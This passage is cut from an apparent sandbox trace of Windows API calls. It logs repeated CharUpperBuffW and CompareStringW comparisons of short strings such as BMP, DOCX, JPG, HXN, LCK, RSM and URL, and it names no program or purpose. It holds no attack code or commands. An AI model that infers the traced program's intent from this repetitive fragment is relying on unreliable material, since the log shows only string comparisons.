(Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, 
dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.578] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.578] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.578] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.578] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.578] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="TRX_DLL", cchCount2=7) returned 1 [0111.578] CharUpperBuffW (in: lpsz="bmp", 
cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODT", cchCount1=3, lpString2="BMP", cchCount2=3) returned 3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOCX", cchCount1=4, lpString2="BMP", cchCount2=3) returned 3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ACRODATA", cchCount1=8, lpString2="BMP", cchCount2=3) returned 1 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOC", cchCount1=3, lpString2="BMP", cchCount2=3) returned 3 [0111.578] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.578] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.578] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.578] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.578] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.578] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.578] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.578] CompareStringW (Locale=0x400, 
dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.578] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.578] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.578] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, 
lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 
[0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.579] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.579] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.580] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.580] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.580] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.580] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.580] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.580] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.580] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.580] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.580] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.580] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.580] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.580] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.580] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.580] CharUpperBuffW (in: lpsz="bmp", 
cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.580] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.580] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.580] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="BMP", cchCount1=3, lpString2="BMP", cchCount2=3) returned 2 [0111.580] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.580] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="BMP", cchCount2=3) returned 3 [0111.580] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODS", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0111.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOC", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0111.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GRL", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0111.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JPG", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0111.588] CharUpperBuffW (in: lpsz="HxW", cchLength=0x3 | out: lpsz="HXW") returned 0x3 [0111.588] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXW", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0111.588] CharUpperBuffW (in: lpsz="HxW", cchLength=0x3 | out: lpsz="HXW") returned 0x3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODS", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOCX", cchCount1=4, lpString2="HXW", cchCount2=3) returned 1 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HXN", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JPG", cchCount1=3, 
lpString2="HXW", cchCount2=3) returned 3 [0111.589] CharUpperBuffW (in: lpsz="HxW", cchLength=0x3 | out: lpsz="HXW") returned 0x3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXW", cchCount1=3, lpString2="HXW", cchCount2=3) returned 2 [0111.589] CharUpperBuffW (in: lpsz="HxH", cchLength=0x3 | out: lpsz="HXH") returned 0x3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXH", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0111.589] CharUpperBuffW (in: lpsz="HxH", cchLength=0x3 | out: lpsz="HXH") returned 0x3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JPG", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOCX", cchCount1=4, lpString2="HXH", cchCount2=3) returned 1 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HXN", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GRL", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0111.589] CharUpperBuffW (in: lpsz="HxD", cchLength=0x3 | out: lpsz="HXD") returned 0x3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXD", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0111.589] CharUpperBuffW (in: lpsz="HxD", cchLength=0x3 | out: lpsz="HXD") returned 0x3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JPG", cchCount1=3, lpString2="HXD", cchCount2=3) returned 3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOCX", cchCount1=4, lpString2="HXD", cchCount2=3) returned 1 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HXH", cchCount1=3, lpString2="HXD", cchCount2=3) returned 3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GRL", cchCount1=3, lpString2="HXD", cchCount2=3) returned 1 [0111.589] CharUpperBuffW (in: lpsz="Lck", cchLength=0x3 | out: lpsz="LCK") returned 0x3 [0111.589] 
CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="LCK", cchCount1=3, lpString2="HXD", cchCount2=3) returned 3 [0111.589] CharUpperBuffW (in: lpsz="Lck", cchLength=0x3 | out: lpsz="LCK") returned 0x3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HXW", cchCount1=3, lpString2="LCK", cchCount2=3) returned 1 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PNG", cchCount1=3, lpString2="LCK", cchCount2=3) returned 3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODS", cchCount1=3, lpString2="LCK", cchCount2=3) returned 3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JPG", cchCount1=3, lpString2="LCK", cchCount2=3) returned 1 [0111.589] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="LCK", cchCount2=3) returned 1 [0111.589] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JPG", cchCount1=3, lpString2="HXN", cchCount2=3) returned 3 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GRL", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HXH", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0111.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.589] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW 
(in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: 
lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.590] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.591] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.591] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.591] 
CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.591] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.591] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.591] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.591] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.591] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.591] CharUpperBuffW (in: lpsz="hxn", cchLength=0x3 | out: lpsz="HXN") returned 0x3 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXN", cchCount1=3, lpString2="HXN", cchCount2=3) returned 2 [0111.591] CharUpperBuffW (in: lpsz="hxl", cchLength=0x3 | out: lpsz="HXL") returned 0x3 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="HXL", cchCount1=3, lpString2="HXN", cchCount2=3) returned 1 [0111.591] CharUpperBuffW (in: lpsz="hxl", cchLength=0x3 | out: lpsz="HXL") returned 0x3 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JPG", cchCount1=3, lpString2="HXL", cchCount2=3) returned 3 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GRL", cchCount1=3, lpString2="HXL", cchCount2=3) returned 1 [0111.591] 
CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HXH", cchCount1=3, lpString2="HXL", cchCount2=3) returned 1 [0111.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HXN", cchCount1=3, lpString2="HXL", cchCount2=3) returned 3 [0111.591] CharUpperBuffW (in: lpsz="rsm", cchLength=0x3 | out: lpsz="RSM") returned 0x3 [0111.591] CharUpperBuffW (in: lpsz="rsm", cchLength=0x3 | out: lpsz="RSM") returned 0x3 [0111.591] CharUpperBuffW (in: lpsz="rsm", cchLength=0x3 | out: lpsz="RSM") returned 0x3 [0111.591] CharUpperBuffW (in: lpsz="rsm", cchLength=0x3 | out: lpsz="RSM") returned 0x3 [0111.591] CharUpperBuffW (in: lpsz="contact", cchLength=0x7 | out: lpsz="CONTACT") returned 0x7 [0111.591] CharUpperBuffW (in: lpsz="contact", cchLength=0x7 | out: lpsz="CONTACT") returned 0x7 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="LOG1", 
